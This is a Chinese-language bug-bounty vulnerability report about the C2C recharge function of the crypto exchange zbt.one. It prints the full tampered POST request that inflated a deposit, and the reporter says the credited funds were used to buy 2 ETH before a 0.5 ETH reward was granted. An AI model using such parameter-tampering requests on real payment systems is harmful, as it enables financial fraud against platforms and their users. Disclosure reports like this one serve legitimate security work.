漏洞URL:
https://zbt.one/c2c
简要描述:
RT 可以越权修改充值,然后居然会到账,也买了以太坊
漏洞证明:
首先在我的钱包,然后点击充值抓包
然后修改POST提交参数,如图所示
发送数据包
这时候点击确认已汇
不知道为什么过段时间就会自动到账
然后我购买了2个以太坊,
漏洞利用代码:
post数据包
POST /c2c/buy HTTP/1.1 Host: zbt.one User-Agent: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: https://zbt.one/c2c Content-Type: application/x-www-form-urlencoded Content-Length: 57 Cookie: Connection: close Upgrade-Insecure-Requests: 1 buyUnitPrice=6.5&buyNumber=11111111&cny_total=72222221.50
修复方案:
无
审核结果:
在审核时漏洞已无法复现,经双方协调,给予 0.5 ETH奖励